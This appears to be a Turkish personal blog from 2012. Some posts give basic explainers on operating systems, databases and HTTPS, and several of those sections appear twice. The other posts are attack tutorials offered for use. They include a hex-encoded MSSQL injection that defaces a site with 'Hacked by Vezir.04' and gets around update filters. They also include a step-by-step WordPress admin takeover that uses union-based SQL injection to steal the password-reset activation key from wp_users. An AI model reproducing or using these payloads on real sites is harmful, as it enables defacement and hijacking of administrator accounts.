21.12.2012
İşletim Sistemi Nedir?
İşletim sistemi bilgisayar donanımını yöneten ve hükmeden yazılım bütünüdür. İşletim sistemi donanımları yönetip bizim bilgisayarda işlem yapmamızı sağlar. Bilgisayarda yapılan bütün işlemler aslında makine dilinde 0 ve 1 den ibarettir. İşletim sistemi bu yaptığımız işlemleri bilgisayar donanımın anlayacağı şekle getirir.
Günümüzde en çok kullanılan işletim sistemleri:
Microsoft Windows:
Günümüzde en yaygın işletim sistemidir. Kullanıcı dostu olduğundan dolayı ve programların hepsi Windows işletim sisteminde çalıştığından tercih edilir.
Linux:
Açık kaynak kodlu bir yazılımdır. Genelde server olarak kullanılır. Windows işletim sisteminden daha performanslı çalışır. Güvenlik açıkları daha azdır ve kişiler kendi isteklerine göre işletim sistemini geliştirebilir.
Mac OS X:
Apple firmasının işletim sistemidir. Genel olarak grafik çalışmaları yapanların tercih ettiği bir işletim sistemidir. Grafik çalışmalarında en iyi performans veren işletim sistemidir. Donanım sistemi yüksek olduğundan dolayı pahallıdır ve bu yüzden çok fazla tercih edilmez.
Android:
Google firmasının Linux tabanından geliştirmiş olduğu mobil işletim sistemidir.
iOS:
Apple firmasının mobil işletim sisitemidir.
MS Dos:
Windows işletim sistemi öncesinde kullanılan işletim sistemidir. Fare kullanımı yoktur sadece klavye ile komut yazılarak işlem yapılır.
İşletim Sistemi Tarihi:
İlk Bilgisayar 1940 lı yıllarda askeri alanda kullanılmaya başlanmıştır. Özel amaçlı kullanılan delikli kartları kontrol için kullanıldı.
Veri tabanı yönetim sistemleri nedir?
Veri tabanı yönetim sistemi ingilizce olarak "Database Management Systems" olarak geçer
.
Veri tabanını bir bilgi kümesi olarak düşünebiliriz. Veri tabanın kullanılmasının sebebi kendi içeresinde olan veri tabanı motoru sayesinde bilgiye daha hızlı ulaşılmasıdır. Veri tabanında metin veya grafik saklayabiliriz.
Ama grafik (Resim) saklamak mantıklı değildir. Boyutunun büyük olması veri tabanını yorar ve böylece işlemci ve rame büyük yük gelir.
Temel SQL komutları:
Insert = veri girişi komutu
Update = veri düzenleme komutu
Delete = veri silme komutu Veritabanın
Genel Olarak Yapısını oluşturan işlemler: Veri tabanı motoru Veri depolama altsistemi Veri sorgulama alt sistemi Veri tanımlama alt sistem Uygulama geliştirme alt sistemi Veri tabanı yönetim alt sistemi
En Çok Kullanılan Veritabanları:
MySQL
PostgreSQL
Oracle
Sybase
MsSQL
Berkeley
Firebird
Ms access
Veri tabanını bir bilgi kümesi olarak düşünebiliriz. Veri tabanın kullanılmasının sebebi kendi içeresinde olan veri tabanı motoru sayesinde bilgiye daha hızlı ulaşılmasıdır. Veri tabanında metin veya grafik saklayabiliriz.
Ama grafik (Resim) saklamak mantıklı değildir. Boyutunun büyük olması veri tabanını yorar ve böylece işlemci ve rame büyük yük gelir.
Temel SQL komutları:
Insert = veri girişi komutu
Update = veri düzenleme komutu
Delete = veri silme komutu Veritabanın
Genel Olarak Yapısını oluşturan işlemler: Veri tabanı motoru Veri depolama altsistemi Veri sorgulama alt sistemi Veri tanımlama alt sistem Uygulama geliştirme alt sistemi Veri tabanı yönetim alt sistemi
En Çok Kullanılan Veritabanları:
MySQL
PostgreSQL
Oracle
Sybase
MsSQL
Berkeley
Firebird
Ms access
4.06.2012
Update'nin filtreli olduğu sitelerde declare kullanımı
Öncelikle herkese merhaba her zaman söze başladığım gibi bu seferde aynısını söylemeyeyim zaman yok diye.Zaman var ama o
zamanlarda farklı işlerle uğraştığım için pek ilgilenemiyorum blogla.Zaten web güvenliği işinide eskisi gibi pek takip etmiyorum
fırsat buldukça bir şeyler paylaşmayada devam edecem .Takip eden yoktur belki ama yinede bir gün birinin işine yarar diye blogu
açık tutuyorum.
Şimdi Mssql veritabanlı bir sistemde update filtreliyse o zaman declare kullanarak update yapmayı deneyebilirsiniz.
http://localhost/url.asp?id=1 and 1=declare @something nvarchar(500) set @something=0x7570646174652B6E6577735F6974656D2B7365742B5469746C653D274861636B65642062792056657A69722E3034272D2D;exec @someting;--
update+news_item+set+Title='Hacked by Vezir.04'-- alttaki kodlar bunun şifrelenmiş hali.
7570646174652B6E6577735F6974656D2B7365742B5469746C653D274861636B65642062792056657A69722E3034272D2D
update+tablo adi+set+kolon adi='Hacked by Vezir.04'-- bu kısma tablo kolon isimlerini yazıp hex ile şifreleyip yolluyoruz.
Bir daha ki sefere görüşmek üzere.
4.03.2012
Post mssql
Post mssql yaparak update yaparak panele girmeyi anlattım.
http://www.4shared.com/rar/Ye0HjQUq/postmssqlinjection.html
http://www.4shared.com/rar/Ye0HjQUq/postmssqlinjection.html
27.02.2012
Wordpress şifre sıfırlama.
Merhaba bügün size wordpress'de şifre sıfırlamayı anlatacam.
Normalde Wordpress sql injection'da user_login,user_pass kolonlarından bilgileri çekeriz . Ama wordpress şifre algoritması olarak portable php password hashing framework kullandığı için bunu kırmak biraz zordur.
Bu şekilde md5 kırma yerine admin mailine aktivasyon kodu göndererek şifre sıfırlamayı nasıl yaparız.
örneğin ;
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from/**/wp_users/*
Şimdi bizim aktivasyon kodunu alabilmemiz için ilk önce şifreyi unuttum deyip admin mailine aktivasyon
kodunu yollatmamız lazım.
http://hedef.com/wp-login.php?action=lostpassword
burdan admin adını yada mailini yazıp aktivasyon kodunu yollamasını istiyoruz.
Ardından user_pass isimli kolon yerine user_activation_key kolonun yazıp aktivasyon kodunu alıyoruz
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_activation_key,0x7c)/**/from/**/wp_users/*
user_login : security
user_activation_key : CDFSAlCsTUvBDUMGHTcd
bu şekilde admin ve şifreyi değiştirmek için işimize yarayacak olan aktivasyon kodunu alıyoruz .
wp-login.php?action=rp&key=[Aktivasyon kodunu buraya ]&login=[Kullanici adinida buraya ]
wp-login.php?action=rp&key=CDFSAlCsTUvBDUMGHTcd&login=security
bu şekilde yaptığımızda yeni şifrenizi yazıp admin olarak giriş yapacaksınız.
Not: Eğer ki aktivasyon kodu yollamadan aktivasyon kodu çekmeye çalışırsanız daha önceden aktivasyon
kodu yollanmadığı için " Can not get Length of 'Column Data' " yazar bunun içinde öncelikle
şifremi unuttum diyip aktivasyon kodunu yollayın.
Normalde Wordpress sql injection'da user_login,user_pass kolonlarından bilgileri çekeriz . Ama wordpress şifre algoritması olarak portable php password hashing framework kullandığı için bunu kırmak biraz zordur.
Bu şekilde md5 kırma yerine admin mailine aktivasyon kodu göndererek şifre sıfırlamayı nasıl yaparız.
örneğin ;
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from/**/wp_users/*
Şimdi bizim aktivasyon kodunu alabilmemiz için ilk önce şifreyi unuttum deyip admin mailine aktivasyon
kodunu yollatmamız lazım.
http://hedef.com/wp-login.php?action=lostpassword
burdan admin adını yada mailini yazıp aktivasyon kodunu yollamasını istiyoruz.
Ardından user_pass isimli kolon yerine user_activation_key kolonun yazıp aktivasyon kodunu alıyoruz
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_activation_key,0x7c)/**/from/**/wp_users/*
user_login : security
user_activation_key : CDFSAlCsTUvBDUMGHTcd
bu şekilde admin ve şifreyi değiştirmek için işimize yarayacak olan aktivasyon kodunu alıyoruz .
wp-login.php?action=rp&key=[Aktivasyon kodunu buraya ]&login=[Kullanici adinida buraya ]
wp-login.php?action=rp&key=CDFSAlCsTUvBDUMGHTcd&login=security
bu şekilde yaptığımızda yeni şifrenizi yazıp admin olarak giriş yapacaksınız.
Not: Eğer ki aktivasyon kodu yollamadan aktivasyon kodu çekmeye çalışırsanız daha önceden aktivasyon
kodu yollanmadığı için " Can not get Length of 'Column Data' " yazar bunun içinde öncelikle
şifremi unuttum diyip aktivasyon kodunu yollayın.
17.02.2012
Http ve Https Arasindaki Fark
Merhaba arkadaşlar uzun süredir pek ilgilenmiyorum .İş , okul derken pek zaman kalmıyor.
Bügün size aslında internete her girdiğimizde gördüğümüz ama ne işe yaradığını bilmediğimiz http ve https arasındaki farkı açıklamaya çalışacam .
Https (Hyper Text Transfer Protocol Secure) genel olarak banka sistemleri , kredi kartı ile alışveriş yapılan ve diğer güvenliğine önem veren firmalara tarafından yaygın olarak kullanılır . Çünkü https de giriş yaptığınızda bilgileriniz sizin ve giriş yaptığınız adres tarafından okunabilecek şekilde şifrelenir.Http de ise böyle bir şifreleme yoktur.Sizin giriş yaptığınız verilere başka kişiler ulaşabilir .
Ek olarak eklemek isteyeceğim bir şey daha var .Dün gece Ttnet borcunu ödemeyi unuttuğum için internet bağlanmaya çalıştığım zaman ttnet borç ödeme ekranına yönleniyordu . http://siteadi.com/ diye siteye bağlanmaya çalıştığım zaman ttnet borc ödeme ekranı çıkıyordu .http:// yerine https://siteadi.com/ diye girdiğim zaman ttnet borc ödeme ekranı çıkmadan rahatlıkla internete bağlanabiliyorsunuz .
Bir daha ki sefer görüşmek dileğiyle .
Bügün size aslında internete her girdiğimizde gördüğümüz ama ne işe yaradığını bilmediğimiz http ve https arasındaki farkı açıklamaya çalışacam .
Https (Hyper Text Transfer Protocol Secure) genel olarak banka sistemleri , kredi kartı ile alışveriş yapılan ve diğer güvenliğine önem veren firmalara tarafından yaygın olarak kullanılır . Çünkü https de giriş yaptığınızda bilgileriniz sizin ve giriş yaptığınız adres tarafından okunabilecek şekilde şifrelenir.Http de ise böyle bir şifreleme yoktur.Sizin giriş yaptığınız verilere başka kişiler ulaşabilir .
Ek olarak eklemek isteyeceğim bir şey daha var .Dün gece Ttnet borcunu ödemeyi unuttuğum için internet bağlanmaya çalıştığım zaman ttnet borç ödeme ekranına yönleniyordu . http://siteadi.com/ diye siteye bağlanmaya çalıştığım zaman ttnet borc ödeme ekranı çıkıyordu .http:// yerine https://siteadi.com/ diye girdiğim zaman ttnet borc ödeme ekranı çıkmadan rahatlıkla internete bağlanabiliyorsunuz .
Bir daha ki sefer görüşmek dileğiyle .
Kaydol:
Kayıtlar (Atom)